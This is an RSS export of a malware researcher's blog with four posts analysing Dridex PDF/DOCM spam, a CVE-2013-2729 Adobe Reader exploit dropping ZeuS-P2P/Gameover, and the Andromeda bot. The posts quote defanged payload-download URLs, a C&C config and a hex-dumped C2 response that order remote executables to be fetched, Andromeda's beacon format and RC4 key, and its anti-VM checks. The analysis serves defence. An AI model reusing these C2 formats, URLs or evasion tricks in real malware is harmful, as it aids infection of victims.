eternal-todo.com - Botnetshttp://eternal-todo.com/taxonomy/term/79/0
enDridex spam campaign using PDF as infection vectorhttp://eternal-todo.com/blog/dridex-spam-campaign-pdf-docm-infection-vector
<style type="text/css">p { margin-bottom: 0.21cm; }a:link { }</style><p style="margin-bottom: 0cm" class="rtejustify">During this month a <a href="https://twitter.com/peepdf/status/851563007914250240">Dridex spam campaign using PDF documents</a> as infection vector was spotted. I also received a couple of e-mails in my personal inbox attaching the mentioned PDF files. One of them was using the typical &ldquo;scanned data&rdquo; theme (subject was <i>&ldquo;Scan data&rdquo;</i> and sender <i>&ldquo;scanner at eternal-todo.com&rdquo;</i>) and the other one was related to a confirmation letter (subject was <i>&ldquo;uk_confirmation_ph764968900.pdf&rdquo;</i> and the sender <i>&ldquo;info at calmbeginnings.co.uk&rdquo;</i>). None of them was really good in social engineering, just adding some words and the attachment.</p>
<p style="margin-bottom: 0cm" class="rtejustify">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_spam_scan_data.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_spam_scan_data_0.png" alt="Dridex Spam Campaign PDF DOCM Scan Data" border="0" height="286" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_spam_confirmation.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_spam_confirmation_0.png" alt="Dridex Spam Campaign PDF DOCM Confirmation Letter" border="0" height="270" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtejustify">Both PDF documents, named <i>&ldquo;Scan_62229.pdf&rdquo;</i> (<a href="https://www.virustotal.com/es/file/4637f33e25203729709d11dba6ecf79c084b92a7da28c1c48c78f30370820f7d/analysis/">81fa2eb97128b6d711158f37698e044f</a>) and <i>&ldquo;</i><i>uk_confirmation_ph764968900.pdf&rdquo;</i> (<a href="https://www.virustotal.com/es/file/05d144e3473c264646ad5e2fe587fd8e8efa57451dc32c5fcf86a444d38f1c39/analysis/">85066792c8952100ac057055a2f49a8c</a>), had a docm file embedded and they were using Javascript code to save and execute the attachment. As you can see in the following image, the <a href="http://help.adobe.com/en_US/acrobat/acrobat_dc_sdk/2015/HTMLHelp/index.html#t=Acro12_MasterBook%2FJS_API_AcroJS%2FDoc_methods.htm%23TOC_exportDataObjectbc-31&amp;rhtocid=_6_1_8_23_1_30">exportDataObject</a> function was used using <i>nLaunch=2</i>, which will save the attachment AND open it afterwards without prompting the user for a path. If the argument <i>nLaunch</i> is not present will just save the document on disk, without opening it. Using <a href="https://github.com/jesparza/peepdf">peepdf</a>'s output is quite easy to locate the interesting objects (<em>object 11</em> for the Javascript code and <em>object 3</em> for the embbedded document).</p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_peepdf_output.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_peepdf_output_0.png" alt="Dridex Spam Campaign PDF DOCM peepdf info" border="0" height="591" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm">Extracting the docm file with <a href="https://eternal-todo.com/tools/peepdf-pdf-analysis-tool">peepdf</a> is as easy as using the <a href="https://github.com/jesparza/peepdf/wiki/Commands"><em><strong>&ldquo;stream&rdquo;</strong></em></a> command together with the &ldquo;greater than&rdquo; sign to save it on disk. Then we can check <a href="https://www.virustotal.com/">VirusTotal</a> with the <em><strong>&ldquo;vtcheck&rdquo;</strong></em> command to see if it is detected as malicious or not.</p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_peepdf_extract_file.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_peepdf_extract_file_0.png" alt="Dridex Spam Campaign PDF DOCM peepdf extract file" border="0" height="291" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rteleft">The two docm files extracted from the PDF document, named <i>&ldquo;ScanData049124.docm&rdquo;</i> (<a href="https://www.virustotal.com/es/file/75728a667dd40d0af0e6b61502d238c3c30e14fe6a738b15455b2dc4fad5ccb5/analysis/">44edff8fa67eb916fda880de42dad708</a>) and <i>&ldquo;20170401907863.docm&rdquo;</i> (<a href="https://www.virustotal.com/es/file/a3d9c11b01aabe9b1c182d438cdf33c4ef4e22a61703d605ada8a6bae0ff9ee4/analysis/">60db2cd260a77934c70c924166cabc5a</a>), are Word documents containing macros. This is the typical infection vector used by the cybercriminals nowadays so I will not go into details here. You can use <a href="https://blog.didierstevens.com/programs/oledump-py/">oledump</a> and other tools to extract and analyze the macros.</p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm">In this case, the macros were downloading an XORed executable from different URLs, decoding it and executing it to infect the machine. The dropped malware (<a href="https://www.virustotal.com/es/file/1072e9f512abaafc1f510b31bcf56fd668f9f7cf558984052720aa85d311bca7/analysis/">f1fd0a8e9443710df0859109588eb5fa</a> and <a href="https://www.virustotal.com/es/file/6739c782d114307deaac42120a7061f51f9e74a86f1e60664997a269784143f2/analysis/">117da8ef79cb0d96c1c803709bd4827f</a>) was Dridex and, more specifically, these were binaries belonging to the botnet 7200. These are the URLs used to download the binaries (some of them still active):</p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<pre><span style="font-size: x-small;">mentalmysteries[.]com/kjv783r<br />semfamily[.]com/kjv783r<br />perisoft[.]org/kjv783r<br />centralsecuritybureau[.]com/874hv<br />tserv[.]su/874hv<br />kapil[.]50webs[.]com/874hv</span></pre><p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm">Normally, there is no useful metadata in malicious PDF files, but in this case using the <strong>&quot;metadata&quot;</strong> command we can see some information. Apparently, the attackers were using <a href="https://github.com/itext">iText</a> to create the PDF files and they were created in a country where the time difference is UTC+3. Of course, this information can be faked, but in this case I would say it is accurate ;)&nbsp; <br />
&nbsp;</p>
<pre><span style="font-size: x-small;">&lt;&lt; /Producer iTextSharp? 5.5.10 ?2000-2016 iText Group NV (AGPL-version)<br />/CreationDate D:20170410150016+03'00'<br />/ModDate D:20170410150016+03'00' &gt;&gt;</span></pre><p style="margin-bottom: 0cm">&nbsp;</p>
<pre><span style="font-size: x-small;">&lt;&lt; /Producer iTextSharp? 5.5.10 ?2000-2016 iText Group NV (AGPL-version)<br />/CreationDate D:20170411122518+03'00'<br />/ModDate D:20170411122518+03'00' &gt;&gt;</span></pre><p style="margin-bottom: 0cm">&nbsp;<br />
In the same way that cybercriminals moved back to use documents with macros to spread malware again, we have seen that they have not forgotten the PDF files as infection vector. PDF documents are still harmless files for lots of users and even if they see warning windows appearing they still click on them and get infected. Luckily, analysts can still use <a href="https://eternal-todo.com/category/peepdf">peepdf</a> to have a good time playing with these malicious documents ;) Happy hunting!<br />
&nbsp;</p>
http://eternal-todo.com/blog/dridex-spam-campaign-pdf-docm-infection-vector#commentsAnalysisBotnetsDridexJavascriptMacrosMalwarePDFpeepdfSun, 23 Apr 2017 23:24:17 +0000jesparza132 at http://eternal-todo.comTravelling to the far side of Andromeda at Botconf 2015http://eternal-todo.com/blog/travelling-far-side-andromeda-botconf
<p>It has been a while since I&nbsp;wrote the last time here and since <a href="https://www.botconf.eu/2015/travelling-to-the-far-side-of-andromeda-2/">I&nbsp;presented at Botconf</a>, but I&nbsp;wanted to share my slides here too. A couple of weks after the <a href="https://en.wikipedia.org/wiki/November_2015_Paris_attacks">sad terrorist attacks in Paris</a>, <a href="https://twitter.com/botconf">Botconf</a> was held in the city of love. Way more secure than before and with lots of security controls which almost made me lose my return train, but it was worth it. Attending a security conference focused on cybercrime, malware, reverse engineering and intelligence is always a good plan :) I really recommend you attending <a href="https://twitter.com/Botconf/status/672801529284444160">Botconf this year in Lyon</a>, you will not regret it ;)</p>
<p>My presentation was about Andromeda. This is the abstract:<br />
&nbsp;<br />
<blockquote> Andromeda, also known as Gamarue by some Antivirus vendors, is a popular and modular bot active since 2011. It is normally used to spread additional malware, but sometimes, depending on the criminals, the main objective could be just stealing user credentials. After almost five years of life its development has not stopped. The people behind it keep maintaining it and adding functionalities, like new anti-analysis routines, changes in the communication encryption, new request formats, etc.<br />
&nbsp; <br />
This talk will not give just details about the latest changes in the Andromeda binary and control panel, but it will also respond some interesting questions about this botnet. Which are the most popular versions used nowadays? Are most of the botnets spreading malware or just using its plugins? What are the most popular plugins? How and where is Andromeda sold? Who is selling it? What criminal groups are using Andromeda? It is not just a talk about malware reversing but about the whole Andromeda ecosystem.</blockquote></p>
<p>&nbsp;</p>
<div class="rtejustify">Since the first time I&nbsp;analyzed Andromeda <a href="http://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis">back in 2013</a> I&nbsp;have been taking a look at the new versions. Last year I&nbsp;published another blog post to give some <a href="http://eternal-todo.com/blog/andromeda-gamarue-loves-json">details about the new JSON version</a> and since then I&nbsp;have been tracking some Andromeda botnets at work, together with my <a href="https://www.fox-it.com/intell/">Fox-IT InTELL</a> colleagues. Thanks to this work we were able to spot some interesting botnets like the botnet used by the <a href="https://www.fox-it.com/en/files/2014/12/Anunak_APT-against-financial-institutions2.pdf">Anunak group</a> or the botnet used by Smilex (<a href="http://www.justice.gov/opa/pr/bugat-botnet-administrator-arrested-and-malware-disabled">Dridex operator arrested last year in Cyprus</a>) to distribute his spam bot. Besides that, I was showing some statistics about the botnets we saw, interesting spread plugins like the spammer (Jahoo/Otlard) <a href="http://malware.dontneedcoffee.com/2015/11/inside-jahoo-otlarda-botnet-dedicated.html">mentioned by Kafeine some days before my presentation</a>, some funny comments about the anti-analysis techniques used by Andromeda and some details about the actors behind Andromeda. Unfortunately, some of this information was just shared at Botconf and it is not for public distribution.</div>
<p>
This is the public version of my slides (you can <a href="http://eternal-todo.com/files/presentations/Travelling%20to%20the%20far%20side%20of%20Andromeda%20-%20Botconf%202015.pdf">download them here</a> and also <a href="https://www.botconf.eu/wp-content/uploads/2015/12/OK-P07-Jose-Esparza-Travelling-to-the-far-side-of-Andromeda-2.pdf">from the Botconf site</a>):<br />
&nbsp;</p>
<div class="rtecenter"><iframe width="500" height="400" frameborder="0" allowfullscreen="" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" scrolling="no" marginheight="0" marginwidth="0" src="//www.slideshare.net/slideshow/embed_code/key/k9x09yO8APjX9K"> </iframe>
<div style="margin-bottom:5px"><strong> <a target="_blank" title="Travelling to the far side of Andromeda" href="//www.slideshare.net/eternaltodo/travelling-to-the-far-side-of-andromeda">Travelling to the far side of Andromeda</a> </strong> from <strong><a target="_blank" href="//www.slideshare.net/eternaltodo">Jose Miguel Esparza</a></strong></div>
<div class="rteleft">&nbsp; <br />
Taking a look at the slides is not so exciting as attending the presentation, hehe, but I&nbsp;think it is enough to have a good idea about the subject and the things I&nbsp;discussed there. If you have any question or comment, be free, shoot! Also via email is ok if you are shy ;) And remember: Botconf, Lyon, 29th of November ;) See you there!</div>
</div>
http://eternal-todo.com/blog/travelling-far-side-andromeda-botconf#commentsActorsAndromedaBotconfBotnetsConferencesIntelligenceMalwareReversingSun, 07 Feb 2016 21:09:54 +0000jesparza130 at http://eternal-todo.comSpammed CVE-2013-2729 PDF exploit dropping ZeuS-P2P/Gameoverhttp://eternal-todo.com/blog/cve-2013-2729-exploit-zeusp2p-gameover
<div class="rtejustify">I am used to receive SPAM emails containing zips and exes, even &quot;PDF files&quot; with double extension (<em>.pdf.exe</em>), but some days ago I received an email with a PDF file attached, without any <em>.exe</em> extension and it didn't look like a Viagra advertisement. Weird. I didn't have time to take a look at it, but the next day I received another one, with a different subject. The subject of the first email was &ldquo;<em>Invoice 454889 April</em>&rdquo; from <em>Sue Mockridge (motherlandjjw949 at gmail.com)</em> attaching <em>&ldquo;April invoice 819953.pdf&rdquo;</em> (eae0827f3801faa2a58b57850f8da9f5), and the second one <em>&ldquo;Image has been sent jesparza&rdquo;</em> from <em>Evernote Service</em> (<em>message at evernote.com</em>, but really <em>protectoratesl9 at gmail.com</em>) attaching <em>&ldquo;Agreemnet-81220097.pdf&rdquo; (2a03ac24042fc35caa92c847638ca7c2)</em>.</div>
<p>&nbsp;</p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/01_cve-2013-2729_invoice_email.png"><img border="0" width="425" height="306" alt="cve-2013-2729_invoice_email" src="/eternal_files/uploads/01_cve-2013-2729_invoice_email_0.png" /></a></div>
<p>&nbsp;</p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/02_cve-2013-2729_evernote_email.png"><img border="0" width="425" height="305" alt="cve-2013-2729_evernote_email" src="/eternal_files/uploads/02_cve-2013-2729_evernote_email_0.png" /></a></div>
<p>&nbsp;<br />
At this point I was really curious so I took a look at them with <a href="http://peepdf.eternal-todo.com/"><em><strong>peepdf</strong></em></a>. <br />
&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/03_cve-2013-2729_peepdf_error.png"><img border="0" width="425" height="345" alt="cve-2013-2729_peepdf_error" src="/eternal_files/uploads/03_cve-2013-2729_peepdf_error_0.png" /></a></div>
<p>&nbsp;<br />
At that moment I only saw a suspicious <em>/AcroForm</em> element, but nothing more. This element was referencing object 1, not shown due to a bug in <a href="https://twitter.com/peepdf"><em><strong>peepdf</strong></em></a>.<br />
&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/04_cve-2013-2729_xfa_form.png"><img border="0" width="425" height="367" alt="cve-2013-2729_xfa_form" src="/eternal_files/uploads/04_cve-2013-2729_xfa_form_0.png" /></a></div>
<p>&nbsp; </p>
<div class="rtejustify">I had to fix it to see the important stream (object 1), encoded twice with <em>/FlateDecode</em>, but in its abbreviated format (<em>[/Fl /Fl]</em>). It was an XFA form, containing Javascript code and an image encoded in Base64. After extracting the stream to a file it had an unusual size, 85MB. Small, eh? ;) Besides containing four script elements, the culprit of this size was the encoded image, a BMP file with a repeating pattern, <em>&ldquo;\x00\x02\xff\x00&rdquo;</em>.</div>
<p>&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/05_cve-2013-2729_bmp_exploit.png"><img border="0" width="450" height="251" alt="cve-2013-2729_bmp_exploit" src="/eternal_files/uploads/05_cve-2013-2729_bmp_exploit_0.png" /></a></div>
<p>&nbsp; </p>
<div class="rtejustify">With this information and thanks to other characteristic strings found in this object (<em>&ldquo;0aa46f9b-2c50-42d4-ab0b-1a1015321da7&rdquo;, &ldquo;// Index of the overlapped string&rdquo;, &ldquo;// Base of the AcroRd32_dll&rdquo;</em>, etc) it was easy to spot the vulnerability exploited here. It turned out to be the <em>Adobe Reader BMP/RLE heap corruption vulnerability (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729">CVE-2013-2729</a>)</em> and <a href="https://github.com/feliam/CVE-2013-2729/blob/master/XFABMPExploit.py">the bad guys copied the PoC written by Felipe Manzano</a> (it was not the first time that the attackers reused code from <a href="https://twitter.com/feliam">Felipe</a>, for example, <a href="http://eternal-todo.com/blog/cve-2011-2462-exploit-analysis-peepdf">in the case of a CVE-2011-2462 exploit</a>). I&nbsp;have to be fair and mention that the bad guys made some extra effort to add more ROP offsets to cover 23 different Adobe Reader versions, from 9.3.0.3 to 11.0.0.1 ;) The vulnerability itself is an <a href="http://www.adobe.com/support/security/bulletins/apsb13-15.html">integer overflow patched one year ago</a> and explained really well by Felipe in these <a href="http://blog.binamuse.com/2013/05/readerbmprle.html">blog post</a> and <a href="http://www.binamuse.com/papers/XFABMPReport.pdf">whitepaper</a>, so nothing to add here.</div>
<p>
Knowing all the details about the exploit it was easy to make <a href="http://code.google.com/p/peepdf/"><em><strong>peepdf</strong></em></a> detect it (update it using the -u flag!):<br />
&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/06_cve-2013-2729_peepdf_detection.png"><img border="0" width="425" height="331" alt="cve-2013-2729_peepdf_detection" src="/eternal_files/uploads/06_cve-2013-2729_peepdf_detection_0.png" /></a></div>
<p>&nbsp; <br />
The shellcode was not hidden at all, it was located in plain sight within one of the script elements, so it was easy to decode with the <em>js_unescape</em> command. <br />
&nbsp;</p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/07_cve-2013-2729_shellcode.png"><img border="0" width="425" height="302" alt="cve-2013-2729_shellcode" src="/eternal_files/uploads/07_cve-2013-2729_shellcode_0.png" /></a></div>
<p>&nbsp; <br />
In both PDF files the shellcode tried to download an executable from a compromised web site:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">hxxp://dr-gottlob-institut.de/11.exe (91aa1168489a732ef7a70ceedc0c3bc9)<br />hxxp://filling-machine-india.com/images/1.exe (5ce7451cce4593698688bd526bfcec78)</span></pre><p>&nbsp; <br />
After the execution of the first binary the system was downloading:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">hxxp://pgalvaoteles.pt/111 (91d33fc439c64bd517f4f10a0a4574f1)<br />hxxp://files.karamellasa.gr/tvcs_russia/2.exe (e070ff758c2af2eee89f4a0f50077e30)</span></pre><p>&nbsp;</p>
<div class="rtejustify">The binary 91d33fc439c64bd517f4f10a0a4574f1 was dropping <a href="http://nakedsecurity.sophos.com/2014/02/27/notorious-gameover-malware-gets-itself-a-kernel-mode-rootkit/">ZeuS-P2P/Gameover with the Necurs rootkit</a>, but the size was unusually big (496,128 bytes). Inside the rootkit a PDB path related to GMER could be found (&ldquo;<em>e:\projects\cpp\gmer\driver\objfre_wxp_x86\i386\gmer.pdb</em>&rdquo;), probably used to disable the rootkit detection.</div>
<p>
After that, another loader was downloaded and executed:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">hxxp://www.shu-versicherungsvergleich.de/loader.exe</span></pre><p>&nbsp;</p>
<div class="rtejustify">From this point and after connecting to <em>pimplelotion.com</em> (95.163.104.88) to receive instructions a lot of binaries were executed. This is an example of the configuration received from this server:</div>
<p>&nbsp;</p>
<pre><span style="font-size: smaller;">&lt;?xml version=&quot;1.0&quot;?&gt;<br />&lt;config&gt;<br />&lt;interval&gt;10&lt;/interval&gt;<br />&lt;timeout&gt;5&lt;/timeout&gt;<br />&lt;urls&gt;hxxp://95.163.104.88&lt;/urls&gt;<br />&lt;country&gt;Netherlands&lt;/country&gt;<br />&lt;tasks&gt;<br />&lt;install id=&quot;1&quot; filetype=&quot;1&quot; name=&quot;soks&quot; autorun=&quot;1&quot; limits=&quot;0:16632&quot; filter=&quot;&quot; hash=&quot;2368a8c8b50900d57c0366049f755c05&quot;&gt;hxxp://segurgestion.es/1.bin&lt;/install&gt;<br />&lt;/tasks&gt;<br />&lt;/config&gt;</span></pre><p>&nbsp;<br />
And the list of URLs I had until I stop monitoring it:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">hxxp://adventiaingenieria.es/222<br />hxxp://segurgestion.es/1.bin<br />hxxp://golestangallery.com/333%283%29.exe<br />hxxp://intropitch.com/1.bin<br />hxxp://regleg.eu/images/777.exe</span></pre><p>&nbsp; </p>
<div class="rtejustify">So it was funny (and weird) to receive directly a PDF exploit via email and not the usual downloader like Andromeda/Upatre to drop ZeuS-P2P/Gameover (among others). Also, it was the first time I was seeing this vulnerability in the wild, because, as far as I know, <a href="http://contagiodump.blogspot.nl/2010/06/overview-of-exploit-packs-update.html">it is not used in any Exploit Kit either</a>. If I am wrong and you think this vuln is common be free to drop a comment ;)</div>
<p></p>
http://eternal-todo.com/blog/cve-2013-2729-exploit-zeusp2p-gameover#commentsBotnetsExploitsGameoverMalwarePDFpeepdfSpamVulnerabilitiesZeuS-P2PTue, 20 May 2014 21:51:20 +0000jesparza119 at http://eternal-todo.comYet another Andromeda / Gamarue analysishttp://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis
<p>Some days ago I read the <a href="http://joe4security.blogspot.nl/2013/08/anti-vm-gone-wrong.html">post about Joe Security's error when they analyzed an Andromeda sample</a> and I also found new samples of this Trojan. Then I decided that I should write something about it. At least, just to remember some tricks of Andromeda for the next time and not starting from scratch. <a href="http://www.youtube.com/watch?v=NOnPbNfKcds">I'm Dory, I forget things ;)</a></p>
<p>When I analyzed this malware some months ago I thought that it was quite interesting due to the Anti-debugging and Anti-VM tricks it uses. You can also find references to <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/gamarue-malware-goes-to-germany/">the same malware with the name of Gamarue</a>. It seems it is cool to rename the same malware with different names. Then you can find some families with three different names, like Cridex / Feodo / Bugat. Anyway, I also found these two links with very good and detailed information about analyzing Andromeda:<br />
&nbsp;</p>
<ul>
<li><a href="http://touchmymalware.blogspot.nl/2012/11/andromeda-v24.html"><strong>Andromeda v2.4 on </strong><em><strong>Touch My Malware</strong></em></a></li>
<li><a href="http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/"><strong>Fooled by Andromeda on</strong> <em><strong>0xEBFE</strong></em></a></li>
</ul>
<p>&nbsp;<br />
I have mostly seen using Andromeda to install banking malware, like <strong>Ice-IX</strong>, <strong>Citadel</strong> and <strong>Sinowal / Torpig</strong> (if it doesn't have more than one name it is not cool). But as you can see in this post on <a href="http://malware.dontneedcoffee.com/2012/07/inside-andromeda-bot-v206-webpanel-aka.html"><em><strong>Malware don't need Coffee</strong></em></a> it can be bought with different plugins too. If the main objective is just stealing credentials then maybe with the <em>Keylogger</em> or <em>Formgrabber</em> plugins plus the <em>Rootkit</em> one (<em>&quot;r.pack&quot;</em>) to stay stealth can be ok. I also saw Andromeda downloading a plugin called <em>&quot;pony&quot;</em>. It was nothing but the infamous Trojan <strong>Pony Loader / Fareit</strong>, which I mentioned when I talked about <a href="http://eternal-todo.com/blog/boston-bombings-redkit-fareit-pony-kelihos-ransomware">the Boston Marathon bombings malware campaign</a>. However, if the objective of the cybercriminals is spread another malware then the function of Andromeda will be as a simple downloader. It is also possible using it for both objectives, of course.</p>
<p>The infection vector that I have seen is just SPAM. It comes zipped and attached to an email message with different subjects like discounts, hotel offers or post mail messages:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/pixmania_spam.png" target="_blank"><img width="425" height="322" border="0" src="/eternal_files/uploads/pixmania_spam_0.png" alt="Andromeda Pixmania Spam" /></a></div>
<p>&nbsp; <br />
The generated traffic of Andromeda can be easily spotted:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/post_andromeda.png" target="_blank"><img width="400" height="226" border="0" src="/eternal_files/uploads/post_andromeda_0.png" alt="Andromeda HTTP Post" /></a></div>
<p>&nbsp;</p>
<div class="rtecenter"><a href="/eternal_files/uploads/post_andromeda_august.png" target="_blank"><img width="400" height="226" border="0" src="/eternal_files/uploads/post_andromeda_august_0.png" alt="Andromeda HTTP Post" /></a></div>
<p>&nbsp; <br />
It is just an HTTP POST request using the User-Agent <strong>&ldquo;Mozilla/4.0&rdquo; </strong>and sending a Base64-encoded string. After decoding it it is also necessary decrypt it with RC4 using a specific key. In the first case, it was using a <a href="https://www.google.com/search?q=d40e75961383124949436f37f45a8cb6+andromeda">default installation key,&nbsp; <strong>&quot;</strong><em><strong>d40e75961383124949436f37f45a8cb6</strong></em></a><strong>&quot;</strong>. The information which the Trojan sends has the format &ldquo;<em>id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu</em>&rdquo;. This is an example of that:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">id:753485172|bid:3|bv:518|sv:1281|pa:0|la:2196749529|ar:1</span></pre><p>&nbsp;<br />
The meaning of the different parameters is the following:<br />
&nbsp; </p>
<ul>
<li><em><strong>id</strong></em>: Bot ID</li>
<li><em><strong>bid</strong></em>: Build number</li>
<li><em><strong>bv</strong></em>: Bot version</li>
<li><em><strong>sv</strong></em>: OS version</li>
<li><em><strong>pa</strong></em>: Boolean to say if it is a x64 platform</li>
<li><em><strong>la</strong></em>: IP (long)</li>
<li><em><strong>ar</strong></em>: Boolean to say if it is executed with the Administrator account</li>
</ul>
<p>&nbsp; <br />
The response is encrypted with RC4 too. However, in this case the key is the Bot ID sent previously. Just before the encrypted data four more bytes are added, they are the CRC32 of the content. Depending on the Trojan version an additional Base64 codification can be added before encrypting with RC4. The response content are the tasks to be executed by the bot (if there is any). For instance, updating the bot binary, installing new plugins, executing an additional executable/DLL, kill the bot, etc. This would be an example of a response:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;"> 00000000 0f 00 00 00 02 01 00 00 00 68 74 74 70 3a 2f 2f |.........http://|<br /> 00000010 63 6c 6f 74 68 65 73 73 68 6f 70 75 70 70 79 2e |clothesshopuppy.|<br /> 00000020 63 6f 6d 2f 70 6c 75 67 2f 72 2e 70 61 63 6b 00 |com/plug/r.pack.|<br /> 00000030 02 02 00 00 00 68 74 74 70 3a 2f 2f 63 6c 6f 74 |.....http://clot|<br /> 00000040 68 65 73 73 68 6f 70 75 70 70 79 2e 63 6f 6d 2f |hesshopuppy.com/|<br /> 00000050 70 6c 75 67 2f 70 6f 6e 79 00 02 03 00 00 00 68 |plug/pony......h|<br /> 00000060 74 74 70 3a 2f 2f 63 6c 6f 74 68 65 73 73 68 6f |ttp://clothessho|<br /> 00000070 70 75 70 70 79 2e 63 6f 6d 2f 70 6c 75 67 2f 70 |puppy.com/plug/p|<br /> 00000080 63 62 00 01 14 00 00 00 68 74 74 70 3a 2f 2f 75 |cb......http://u|<br /> 00000090 74 61 68 62 6c 69 6e 64 73 2e 69 65 2f 63 69 74 |tahblinds.ie/cit|<br /> 000000a0 61 2e 65 78 65 00 00 0a |a.exe...| <br /> </span></pre><p>&nbsp;<br />
The first four bytes are the request rate and then there is an array of tasks to execute. The format of each task is &ldquo;<em>Command ID (1 byte) &ndash; Task ID (4 bytes) &ndash; Parameter (X bytes)</em>&rdquo;. In this example we can see that the command to install a new plugin is <em>0x02</em> and to execute a new binary is <em>0x01</em>. In both cases the parameter is a URL.</p>
<p>If you have a clean sample of Andromeda (after unpacking/decrypting), then you can use IDA Pro and the <a href="https://github.com/0xEBFE/Andromeda-payload">IDAPython script</a> created by <a href="https://twitter.com/0x0000EBFE">0xEBFE</a> to <a href="http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/">decrypt and decompress the payloads</a>. This way you can find the RC4 key used to encrypt the communications and the potential plugins:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/decrypt_plugin_ida.png" target="_blank"><img width="425" height="236" border="0" src="/eternal_files/uploads/decrypt_plugin_ida_0.png" alt="Andromeda Plugin Decryption" /></a></div>
<p>&nbsp; <br />
Another way to find the RC4 key is taking a look at the memory of the processes created by Andromeda. Although the URL that you can see in the following screenshot is not the good one, the key is valid.<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/key_in_memory_2.png" target="_blank"><img width="425" height="311" border="0" src="/eternal_files/uploads/key_in_memory_2_0.png" alt="Andromeda RC4 Key" /></a></div>
<p>&nbsp; <br />
It was funny to see a really nice C&amp;C domain being used in one of the analyzed samples, &ldquo;<em><strong>thisshitismoresafethanpentagonfuckyoufedsbecausethisisaf.com/image.php</strong></em>&rdquo;:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/feds_message.png" target="_blank"><img width="425" height="340" border="0" src="/eternal_files/uploads/feds_message_0.png" alt="Andromeda Feds message" /></a></div>
<p>&nbsp; <br />
However, it was nothing but a cool message, because this domain was modified later using XOR to obtain the real C&amp;C endpoint. <br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/url_dexored.png" target="_blank"><img width="425" height="274" border="0" src="/eternal_files/uploads/url_dexored_0.png" alt="Andromeda URL dexored" /></a></div>
<p>&nbsp; <br />
One thing that is not mentioned in the other analyses is that this Trojan also creates hooks in the functions <em>NtQueryInformationProcess</em>, <em>NtOpenProcess</em> and <em>RtlRaiseException</em> of the new process (<em>wuauclt.exe</em>, in this case):<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/gmer_clean_hooks.png" target="_blank"><img width="400" height="259" border="0" src="/eternal_files/uploads/gmer_clean_hooks_0.png" alt="Andromeda hooks" /></a></div>
<p>&nbsp; <br />
You can find below the summary of the techniques used to difficult the analysis:</p>
<ul>
<li>Breakpoint detection</li>
<li>Custom exception handler to load the real payload</li>
<li>Check if certain DLLs are loaded in the system: <em>guard32.dll</em> (<em>Comodo Firewall</em>) and <em>sbiedll.dll</em> (<em>Sandboxie</em>).</li>
<li>Check if some forbidden processes are running: <em>vmwareuser.exe, vboxservice.exe, procmon.exe, wireshark.exe</em>, etc.</li>
<li>Comparison between the main disk ID (<em>system\currentcontrolset\services\disk\enum@0</em>) and the strings &ldquo;<em>vmwa</em>&rdquo;, &ldquo;<em>vbox</em>&rdquo; and &ldquo;<em>qemu</em>&rdquo;.</li>
<li>Time execution check using the instruction <a href="http://faydoc.tripod.com/cpu/rdtsc.htm"><strong>RDTSC</strong></a>.</li>
</ul>
<p>&nbsp; <br />
